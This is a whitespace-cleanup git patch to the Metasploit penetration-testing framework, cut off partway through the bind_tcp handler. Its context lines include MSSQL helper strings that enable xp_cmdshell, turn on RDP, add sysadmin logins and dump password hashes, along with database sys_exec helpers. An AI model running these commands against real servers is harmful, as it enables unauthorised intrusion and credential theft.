From bf105f48cb51a12fae589bbc71c227ccaed4e496 Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 20 Nov 2011 12:32:06 +1100 Subject: [PATCH] massive removal of spaces at EOL and some bad tabs --- lib/msf/base.rb | 2 +- lib/msf/core.rb | 2 +- lib/msf/core.rb.ts.rb | 4 +- lib/msf/core/encoding/xor.rb | 4 +- lib/msf/core/exploit/brutetargets.rb | 8 +- lib/msf/core/exploit/capture.rb | 34 ++-- lib/msf/core/exploit/cmdstager_tftp.rb | 2 +- lib/msf/core/exploit/dcerpc_epm.rb | 10 +- lib/msf/core/exploit/fileformat.rb | 2 +- lib/msf/core/exploit/ipv6.rb | 10 +- lib/msf/core/exploit/lorcon.rb | 33 ++-- lib/msf/core/exploit/mssql_commands.rb | 38 ++--- lib/msf/core/exploit/mysql.rb | 8 +- lib/msf/core/exploit/pdf.rb | 6 +- lib/msf/core/exploit/postgres.rb | 2 +- lib/msf/core/exploit/riff.rb | 2 +- lib/msf/core/exploit/smb.rb | 10 +- lib/msf/core/exploit/smtp_deliver.rb | 6 +- lib/msf/core/exploit/snmp.rb | 18 +-- lib/msf/core/exploit/tcp.rb | 6 +- lib/msf/core/exploit/tns.rb | 8 +- lib/msf/core/handler/bind_tcp.rb | 24 +-- lib/msf/core/handler/find_shell.rb | 4 +- lib/msf/core/handler/find_tag.rb | 8 +- lib/msf/core/handler/find_tty.rb | 2 +- lib/msf/core/handler/none.rb | 4 +- lib/msf/core/handler/reverse_http.rb | 18 +-- lib/msf/core/handler/reverse_https.rb | 6 +- lib/msf/core/handler/reverse_tcp.rb | 30 ++-- lib/msf/core/handler/reverse_tcp_allports.rb | 4 +- lib/msf/core/model/cred.rb | 2 +- lib/msf/core/model/host.rb | 10 +- lib/msf/core/model/macro.rb | 2 +- lib/msf/core/model/service.rb | 4 +- lib/msf/core/model/web_site.rb | 14 +- lib/msf/core/module/auxiliary_action.rb | 2 +- lib/msf/core/module/platform.rb | 26 +-- lib/msf/core/module/reference.rb | 2 +- lib/msf/core/module/target.rb | 12 +- lib/msf/core/module/target.rb.ut.rb | 4 +- lib/msf/core/payload/aix.rb | 14 +- lib/msf/core/payload/java.rb | 2 +- lib/msf/core/payload/linux.rb | 6 +- lib/msf/core/payload/netware.rb | 16 +- lib/msf/core/payload/single.rb | 4 +- lib/msf/core/post/file.rb | 8 +- lib/msf/core/rpc/auth.rb | 10 +- lib/msf/core/rpc/base.rb | 6 +- lib/msf/core/rpc/db.rb | 152 +++++++++--------- lib/msf/core/rpc/job.rb | 6 +- lib/msf/core/rpc/module.rb | 2 +- lib/msf/core/rpc/plugin.rb | 4 +- lib/msf/core/rpc/service.rb | 20 +-- lib/msf/core/rpc/session.rb | 10 +- lib/msf/core/rpc/v10/constants.rb | 6 +- lib/msf/core/rpc/v10/rpc_auth.rb | 4 +- lib/msf/core/rpc/v10/rpc_base.rb | 6 +- lib/msf/core/rpc/v10/rpc_console.rb | 8 +- lib/msf/core/rpc/v10/rpc_core.rb | 32 ++-- lib/msf/core/rpc/v10/rpc_db.rb | 102 ++++++------ lib/msf/core/rpc/v10/rpc_job.rb | 10 +- lib/msf/core/rpc/v10/rpc_module.rb | 8 +- lib/msf/core/rpc/v10/rpc_plugin.rb | 6 +- lib/msf/core/rpc/v10/rpc_session.rb | 12 +- lib/msf/core/session/basic.rb | 2 +- lib/msf/core/session/interactive.rb | 2 +- lib/msf/core/session/netware_console.rb | 40 ++--- .../session/provider/multi_command_shell.rb | 2 +- lib/msf/core/task_manager.rb | 6 +- lib/msf/ui/console/command_dispatcher.rb | 4 +- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- lib/msf/ui/console/command_dispatcher/nop.rb | 2 +- .../ui/console/command_dispatcher/payload.rb | 4 +- lib/msf/ui/console/driver.rb | 52 +++--- lib/msf/util/exe.rb | 12 +- 75 files changed, 487 insertions(+), 488 deletions(-) diff --git a/lib/msf/base.rb b/lib/msf/base.rb index bf264377c8..5257eeed38 100644 --- a/lib/msf/base.rb +++ b/lib/msf/base.rb @@ -6,7 +6,7 @@ # The base library provides implementations for some of the default # sessions, such as Shell, Meterpreter, DispatchNinja, and VNC. These # sessions are used by modules that come pre-packaged with the default -# module distribution of Metasploit and are depended on by their +# module distribution of Metasploit and are depended on by their # respective payloads. # # Beyond providing the default sessions, framework-base also provides diff --git a/lib/msf/core.rb b/lib/msf/core.rb index e49369863a..f0bbb13528 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -38,7 +38,7 @@ require 'msf/core/plugin_manager' require 'msf/core/session' require 'msf/core/session_manager' - + # Wrappers require 'msf/core/encoded_payload' diff --git a/lib/msf/core.rb.ts.rb b/lib/msf/core.rb.ts.rb index 410570a4b5..b1e7c0344e 100644 --- a/lib/msf/core.rb.ts.rb +++ b/lib/msf/core.rb.ts.rb @@ -30,7 +30,7 @@ class Msf::TestSuite suite << Msf::Module::PlatformList::UnitTest.suite suite << Msf::Module::Reference::UnitTest.suite suite << Msf::Module::Target::UnitTest.suite - + suite << Msf::Handler::BindTcp::UnitTest.suite suite << Msf::Handler::ReverseTcp::UnitTest.suite @@ -40,4 +40,4 @@ class Msf::TestSuite return suite; end -end \ No newline at end of file +end diff --git a/lib/msf/core/encoding/xor.rb b/lib/msf/core/encoding/xor.rb index 4e1ebf5f30..bbb64cb9eb 100644 --- a/lib/msf/core/encoding/xor.rb +++ b/lib/msf/core/encoding/xor.rb @@ -21,10 +21,10 @@ class Xor cblock ^= key oblock += [ cblock ].pack(block_pack) end - + return oblock end end -end end \ No newline at end of file +end end diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb index 38e06147d7..ef1c0a4b9a 100644 --- a/lib/msf/core/exploit/brutetargets.rb +++ b/lib/msf/core/exploit/brutetargets.rb @@ -16,16 +16,16 @@ module Exploit::BruteTargets def exploit(*args) # Brute force through every available target if (not datastore['TARGET'] or datastore['TARGET'].to_i == 0) - + print_status("Brute forcing with #{(targets.length - 1)} possible targets") - + targets.each_index do |i| next if i == 0 break if session_created? print_status("Trying target #{targets[i].name}...") exploit_target(targets[i]) end - + # Otherwise, only try the specified target else exploit_target(target()) @@ -36,4 +36,4 @@ end end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index 0089fae6d3..1932fa2aff 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb @@ -83,7 +83,7 @@ module Exploit::Capture else dev = opts['INTERFACE'] || datastore['INTERFACE'] || nil end - + len = (opts['SNAPLEN'] || datastore['SNAPLEN'] || 65535).to_i tim = (opts['TIMEOUT'] || datastore['TIMEOUT'] || 0).to_i fil = opts['FILTER'] || datastore['FILTER'] @@ -350,7 +350,7 @@ module Exploit::Capture p = PacketFu::ARPPacket.new p.arp_opcode = 1 p.arp_daddr_ip = target_ip || datastore['RHOST'] - p.arp_saddr_ip = source_ip || datastore['LHOST'] + p.arp_saddr_ip = source_ip || datastore['LHOST'] my_eth = self.arp_cache[Rex::Socket.source_address(target_ip)] p.arp_saddr_mac = my_eth || "00:00:00:00:00:00" return p @@ -405,10 +405,10 @@ module Exploit::Capture # which want it should check explicitly for it. TODO: Bug upstream # to release it for real in 0.9.3 def netifaces_implemented? - @pcaprub_loaded and + @pcaprub_loaded and Pcap.respond_to?(:lookupaddrs) and Pcap.respond_to?(:interfaces) and - Pcap.respond_to?(:addresses) + Pcap.respond_to?(:addresses) end def list_interfaces @@ -427,14 +427,14 @@ module Exploit::Capture else return false end - else + else return false end else return Pcap.interfaces.include?(dev) end end - + # This function is usefull only on windows where pcaprub use the GUID def get_interface_guid(dev) check_pcaprub_loaded @@ -445,7 +445,7 @@ module Exploit::Capture else return dev end - else + else return dev end else #Non windows @@ -457,7 +457,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} does not exist" if !addrs + raise RuntimeError, "Interface #{dev} does not exist" if !addrs raise RuntimeError, "Can not get mac address for interface #{dev}" if !addrs[Pcap::AF_LINK][0]['addr'] addrs[Pcap::AF_LINK][0]['addr'] end @@ -466,7 +466,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} does not exist" if !addrs + raise RuntimeError, "Interface #{dev} does not exist" if !addrs addrs[Pcap::AF_INET].length end @@ -474,7 +474,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get the IPv4 address for interface #{dev}" if !addrs[Pcap::AF_INET][num]['addr'] addrs[Pcap::AF_INET][num]['addr'] @@ -484,7 +484,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get IPv4 netmask for interface #{dev}" if !addrs[Pcap::AF_INET][num]['netmask'] addrs[Pcap::AF_INET][num]['netmask'] @@ -494,7 +494,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get IPv4 broadcast address for interface #{dev}" if !addrs[Pcap::AF_INET][num]['broadcast'] addrs[Pcap::AF_INET][num]['broadcast'] @@ -505,7 +505,7 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs addrs[Pcap::AF_INET6].length end @@ -515,7 +515,7 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv6 address at position #{num}" if addrs[Pcap::AF_INET6].length < num + 1 raise RuntimeError, "Can not get ipv6 address for interface #{dev}" if !addrs[Pcap::AF_INET6][num]['addr'] addrs[Pcap::AF_INET6][num]['addr'].gsub(/%(.)*$/,'') @@ -526,13 +526,13 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv6 address at position #{num}" if addrs[Pcap::AF_INET6].length < num + 1 raise RuntimeError, "Can not get ipv6 netmask address for interface #{dev}" if !addrs[Pcap::AF_INET6][num]['netmask'] addrs[Pcap::AF_INET6][num]['netmask'] end - - # Protocol-specific encoding/decoding methods until more + + # Protocol-specific encoding/decoding methods until more # application protos get into PacketFu proper # Intended to be used as the payload to an ICMP echo request's payload diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 083f80b92e..032767f6a0 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -58,7 +58,7 @@ module Exploit::CmdStagerTFTP def execute_cmdstager_end(opts) stop_service end - + def payload_exe return nil if not @stager_instance @stager_instance.payload_exe diff --git a/lib/msf/core/exploit/dcerpc_epm.rb b/lib/msf/core/exploit/dcerpc_epm.rb index 71e795a6ec..e505ae75d8 100644 --- a/lib/msf/core/exploit/dcerpc_epm.rb +++ b/lib/msf/core/exploit/dcerpc_epm.rb @@ -98,13 +98,13 @@ module Exploit::Remote::DCERPC_EPM else # Break the loop early if we get another NULL handle break if hnd == [0, 0, 0, 0, 1].pack("V*") - - # Use the existing handle if we already have one + + # Use the existing handle if we already have one data = [0, 0, 0, 0, 0].pack("V*") + hnd end ret = dce.call(2, data) - + if ( dce.last_response == nil or dce.last_response.stub_data == nil or @@ -136,7 +136,7 @@ module Exploit::Remote::DCERPC_EPM # Determine number of records rcnt = buf[soff, 2].unpack('v')[0] soff += 2 - + # Parse the data from the stack 1.upto(rcnt) do |i| rlen = buf[soff, 2].unpack('v')[0] @@ -206,7 +206,7 @@ module Exploit::Remote::DCERPC_EPM info[:host].gsub!("\x00", '') if info[:host] res << info - + # Handle a buggy response from a Likewise server that can result in a loop otherwise break if hnd == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1].pack("V*") end diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb index 70866fda4f..fa03829eff 100644 --- a/lib/msf/core/exploit/fileformat.rb +++ b/lib/msf/core/exploit/fileformat.rb @@ -28,7 +28,7 @@ module Exploit::FILEFORMAT def file_create(data) fname = datastore['FILENAME'] ltype = "exploit.fileformat.#{self.shortname}" - full_path = store_local(ltype, nil, data, fname) + full_path = store_local(ltype, nil, data, fname) print_good "#{fname} stored at #{full_path}" end diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 5b2dac9bf5..e8c0a16a16 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -41,7 +41,7 @@ module Exploit::Remote::Ipv6 def ipv6_interface(opts={}) opts['INTERFACE'] || datastore['INTERFACE'] || ::Pcap.lookupdev end - + # # Shortcut method for determining our link-local address # @@ -55,7 +55,7 @@ module Exploit::Remote::Ipv6 def ipv6_mac(opts={}) Rex::Socket.ipv6_mac(ipv6_interface(opts)) end - + # # Opens a pcaprub capture interface to inject packets, and sniff ICMPv6 packets # @@ -219,7 +219,7 @@ module Exploit::Remote::Ipv6 # Helper methods that haven't made it upstream yet. Mostly packet data # packers, also a checksum calculator. # - + def ipv6_icmpv6_echo_request(id,seq,data) type = 0x80 code = 0 @@ -239,7 +239,7 @@ module Exploit::Remote::Ipv6 this_opt << data[pos+2, (pos-2 + (len * 8))] opts << this_opt pos += this_opt.pack("CCa*").size - end + end opts end @@ -251,7 +251,7 @@ module Exploit::Remote::Ipv6 ["fe80", "", mac[0,2].join, mac[2,2].join("ff:fe"), mac[4,2].join].join(":") end - # From Jon Hart's Racket::L3::Misc#soll_mcast_addr6(), + # From Jon Hart's Racket::L3::Misc#soll_mcast_addr6(), # which is from DDniele Belluci def ipv6_soll_mcast_addr6(addr) h = addr.split(':')[-2, 2] diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb index 61524c14b4..a01b98e574 100644 --- a/lib/msf/core/exploit/lorcon.rb +++ b/lib/msf/core/exploit/lorcon.rb @@ -12,23 +12,22 @@ module Exploit::Lorcon # # Initializes an instance of an exploit module that accesses a 802.11 network # - def initialize(info = {}) super default_intf = 'ath0' default_driver = 'madwifing' - + if (Rex::Compat.is_windows()) # Default to the the first airpcap device on Windows default_intf = "\\\\.\\airpcap00" - + # Default to the airpcap driver on Windows default_driver = 'airpcap' end - + register_options( [ OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]), @@ -39,36 +38,36 @@ module Exploit::Lorcon ], Msf::Exploit::Lorcon ) - + begin - + if(Rex::Compat.is_windows()) airpcap = Rex::FileUtils.find_full_path("airpcap.dll") if (not airpcap) raise RuntimeError, "The airpcap.dll library must be installed" end end - + require 'Lorcon' @lorcon_loaded = true - + rescue ::Exception => e @lorcon_loaded = false @lorcon_error = e end - + end # # Opens a handle to the specified wireless device # def open_wifi - + if (not @lorcon_loaded) print_status("The Lorcon module is not available: #{@lorcon_error}") raise RuntimeError, "Lorcon not available" end - + # XXX: Force the interface to be up system("ifconfig", datastore['INTERFACE'], "up") @@ -80,7 +79,7 @@ module Exploit::Lorcon # Configure the card for reliable injection self.wifi.fmode = "INJECT" self.wifi.channel = (datastore['CHANNEL'] || 11).to_i - + # Configure modulation begin @@ -88,7 +87,7 @@ module Exploit::Lorcon rescue ::ArgumentError => e print_status("Warning: #{e}") end - + # Configure the transmission rate begin self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE'] @@ -109,19 +108,19 @@ module Exploit::Lorcon def eton(addr) addr.split(':').map { |c| c.hex.chr }.join end - + def channel self.wifi.channel end - + def next_channel cur = self.wifi.channel nxt = (cur > 10) ? 1 : cur + 1 self.wifi.channel = nxt end - + attr_accessor :wifi end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/mssql_commands.rb b/lib/msf/core/exploit/mssql_commands.rb index 39093938a6..5168376558 100644 --- a/lib/msf/core/exploit/mssql_commands.rb +++ b/lib/msf/core/exploit/mssql_commands.rb @@ -9,72 +9,72 @@ module Msf module Exploit::Remote::MSSQL_COMMANDS # Re-enable the xp_cmdshell stored procedure in 2005 and 2008 - def mssql_xpcmdshell_enable(opts={}); + def mssql_xpcmdshell_enable(opts={}) "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" end # Re-enable the xp_cmdshell stored procedure on 2000 - def mssql_xpcmdshell_enable_2000(opts={}); + def mssql_xpcmdshell_enable_2000(opts={}) "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';" end # Disable the xp_cmdshell stored procedure on 2005 and 2008 - def mssql_xpcmdshell_disable(opts={}); + def mssql_xpcmdshell_disable(opts={}) "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;" end # Disable the xp_cmdshell stored procedure in 2000 - def mssql_sql_xpcmdshell_disable_2000(opts={}); + def mssql_sql_xpcmdshell_disable_2000(opts={}) "exec sp_dropextendedproc 'xp_cmdshell';" end # Rebuild xp_cmdshell if it was deleted - def mssql_rebuild_xpcmdshell(opts={}); + def mssql_rebuild_xpcmdshell(opts={}) "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;" end - + # Turn on RDP - def mssql_rdp_enable(opts={}); + def mssql_rdp_enable(opts={}) "exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 0';" end # Grab servername - def mssql_enumerate_servername(opts={}); + def mssql_enumerate_servername(opts={}) "SELECT @@SERVERNAME" end # Get SQL Server Version Info - def mssql_sql_info(opts={}); + def mssql_sql_info(opts={}) "SELECT @@VERSION" end # Add random user and random password to "sa" role on MSSQL - def mssql_sa_escalation(opts={}); + def mssql_sa_escalation(opts={}) var_username = opts[:username] || rand_text_alpha(5) var_password = opts[:password] || rand_text_alpha(10) "exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'" end # Add SQL current user to sysadmin group - def mssql_current_user_escalation(opts={}); + def mssql_current_user_escalation(opts={}) "declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'" end - - def mssql_2k5_password_hashes(opts={}); + + def mssql_2k5_password_hashes(opts={}) "SELECT name, password_hash FROM master.sys.sql_logins" end - - def mssql_2k_password_hashes(opts={}); + + def mssql_2k_password_hashes(opts={}) "SELECT name, password FROM master..sysxlogins" end - - def mssql_is_sysadmin(opts={}); + + def mssql_is_sysadmin(opts={}) "SELECT is_srvrolemember('sysadmin')" end - + def mssql_db_names(opts={}) "SELECT name FROM master..sysdatabases" end - + end end diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index c729ffb7fc..c3617754df 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -75,7 +75,7 @@ module Exploit::Remote::MYSQL base_res = nil plugin_res = mysql_get_variable("@@plugin_dir") rescue nil begin - res = mysql_query("show variables like 'basedir'") + res = mysql_query("show variables like 'basedir'") base_res = res.first[1] if res.respond_to? :first rescue nil @@ -160,10 +160,10 @@ module Exploit::Remote::MYSQL target_path = mysql_get_plugin_dir if target_path print_status "Target arch (#{arch}) and target path both okay." - soname = mysql_upload_sys_udf(arch,target_path) + soname = mysql_upload_sys_udf(arch,target_path) mysql_drop_and_create_sys_exec(soname) return true - else + else print_status "Cannot determine an appropriate target path." false end @@ -185,7 +185,7 @@ module Exploit::Remote::MYSQL def mysql_sys_exec(cmd,doprint=false,opts={}) res = mysql_query("select sys_exec('#{cmd}')") if res && doprint - print_status "Executing: #{cmd}" + print_status "Executing: #{cmd}" return res end end diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 246a03686c..112cff562b 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -27,11 +27,11 @@ module Exploit::PDF @xref = [] @pdf = '' end - + ## #Original Filters ## - + def ASCIIHexWhitespaceEncode(str) return str if not datastore['PDF::Obfuscate'] result = "" @@ -102,7 +102,7 @@ module Exploit::PDF input = stream.dup while i < input.size do - + if input.length - i < 4 addend = 4 - (input.length - i) input << "\0" * addend diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 843e2c1e93..621976f2fe 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -280,7 +280,7 @@ module Exploit::Remote::Postgres def postgres_sys_exec(cmd) q = "select pg_temp.sys_exec('#{cmd}')" resp = postgres_query(q) - if resp[:sql_error] + if resp[:sql_error] print_error resp[:sql_error] return false end diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 725fb1fed3..997cd7a445 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -22,7 +22,7 @@ module Exploit::RIFF return tag + [len].pack('V') + data + ("\x00" * padding) end - + # # Builds a RIFF list chunk (one containing other chunks) # diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index e8ac242aa1..03f13e46b9 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -75,7 +75,7 @@ module Exploit::Remote::SMB # Control the identified operating system of the client # OptString.new('SMB::Native_OS', [ true, 'The Native OS to send during authentication', 'Windows 2000 2195']), - OptString.new('SMB::Native_LM', [ true, 'The Native LM to send during authentication', 'Windows 2000 5.0']), + OptString.new('SMB::Native_LM', [ true, 'The Native LM to send during authentication', 'Windows 2000 5.0']), ], Msf::Exploit::Remote::SMB) @@ -168,7 +168,7 @@ module Exploit::Remote::SMB end #the default chunk size of 48000 for OpenFile is not compatible when signing is enabled (and with some nt4 implementations) - #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED + #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED #fd.chunk_size = 500 is better def smb_open(path, perm) self.simple.open(path, perm, datastore['SMB::ChunkSize']) @@ -760,7 +760,7 @@ module Exploit::Remote::SMBServer end def smb_set_defaults(c, pkt) - smb = @state[c] + smb = @state[c] pkt['Payload']['SMB'].v['ProcessID'] = smb[:process_id].to_i pkt['Payload']['SMB'].v['UserID'] = smb[:user_id].to_i pkt['Payload']['SMB'].v['TreeID'] = smb[:tree_id].to_i @@ -776,12 +776,12 @@ module Exploit::Remote::SMBServer pkt['Payload']['SMB'].v['Command'] = cmd pkt['Payload']['SMB'].v['Flags1'] = 0x88 if esn - pkt['Payload']['SMB'].v['Flags2'] = 0xc801 + pkt['Payload']['SMB'].v['Flags2'] = 0xc801 else pkt['Payload']['SMB'].v['Flags2'] = 0xc001 end pkt['Payload']['SMB'].v['ErrorClass'] = errorclass - c.put(pkt.to_s) + c.put(pkt.to_s) end diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 077af3078c..97e41d8a69 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -11,7 +11,7 @@ require 'rex/mime' ### module Exploit::Remote::SMTPDeliver - + include Exploit::Remote::Tcp # @@ -100,7 +100,7 @@ module Exploit::Remote::SMTPDeliver raw_send_recv("#{auth}\r\n",nsock) else print_status("Server requested auth and no creds given, trying to continue anyway") - end + end elsif res =~ /AUTH/ print_error("Server doesn't accept any supported authentication, trying to continue anyway") else @@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 attr_reader :banner - + protected attr_writer :banner #:nodoc: diff --git a/lib/msf/core/exploit/snmp.rb b/lib/msf/core/exploit/snmp.rb index b6e1c3e883..2cbfe6b386 100644 --- a/lib/msf/core/exploit/snmp.rb +++ b/lib/msf/core/exploit/snmp.rb @@ -9,11 +9,11 @@ module Msf # ### module Exploit::Remote::SNMPClient - - + + include Exploit::Remote::Udp - + # # Creates an instance of a SNMP exploit module. # @@ -29,9 +29,9 @@ module Exploit::Remote::SNMPClient OptString.new('VERSION', [ true, 'SNMP Version <1/2c>', '1' ]), OptInt.new('TIMEOUT', [ true, 'SNMP Timeout', 1 ]), OptInt.new('RETRIES', [ true, 'SNMP Retries', 1 ]) - ], Msf::Exploit::Remote::SNMPClient) + ], Msf::Exploit::Remote::SNMPClient) end - + # # This method wraps the snmp library and passes in # the Rex UDP socket @@ -52,20 +52,20 @@ module Exploit::Remote::SNMPClient :Transport => SNMP::RexUDPTransport, :Socket => s ) - + @snmp = snmp if global snmp end - + def disconnect_snmp @snmp.close if @snmp @snmp = nil end - + def snmp @snmp end - + def community datastore['COMMUNITY'] || 'public' end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 0cd7661dd4..6dfab710cb 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -289,7 +289,7 @@ module Exploit::Remote::TcpServer OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), - + ], Msf::Exploit::Remote::TcpServer) register_advanced_options( @@ -368,7 +368,7 @@ module Exploit::Remote::TcpServer else comm = nil end - + self.service = Rex::Socket::TcpServer.create( 'LocalHost' => srvhost, 'LocalPort' => srvport, @@ -423,7 +423,7 @@ module Exploit::Remote::TcpServer self.service.deref if self.service.kind_of?(Rex::Service) if self.service.kind_of?(Rex::Socket) self.service.close - self.service.stop + self.service.stop end self.service = nil rescue ::Exception diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb index 12a38b043f..863f47664e 100644 --- a/lib/msf/core/exploit/tns.rb +++ b/lib/msf/core/exploit/tns.rb @@ -8,9 +8,9 @@ module Msf # ### module Exploit::Remote::TNS - + include Exploit::Remote::Tcp - + # # Creates an instance of a TNS exploit module. # @@ -28,7 +28,7 @@ module Exploit::Remote::TNS def tns_packet(connect_data) packet_length = [58 + connect_data.length].pack('n') - + # Packet length pkt = packet_length # Checksum @@ -98,6 +98,6 @@ module Exploit::Remote::TNS return pkt end - + end end diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index e03c419c36..8051b24764 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -62,12 +62,12 @@ module BindTcp # Starts a new connecting thread # def add_handler(opts={}) - + # Merge the updated datastore values opts.each_pair do |k,v| datastore[k] = v end - + # Start a new handler start_handler end @@ -79,19 +79,19 @@ module BindTcp # Maximum number of seconds to run the handler ctimeout = 150 - + if (exploit_config and exploit_config['active_timeout']) ctimeout = exploit_config['active_timeout'].to_i end - + # Take a copy of the datastore options rhost = datastore['RHOST'] lport = datastore['LPORT'] - + # Ignore this if one of the required options is missing return if not rhost return if not lport - + # Only try the same host/port combination once phash = rhost + ':' + lport.to_s return if self.listener_pairs[phash] @@ -100,17 +100,17 @@ module BindTcp # Start a new handling thread self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) { client = nil - + print_status("Started bind handler") if (rhost == nil) - raise ArgumentError, + raise ArgumentError, "RHOST is not defined; bind stager cannot function.", caller end stime = 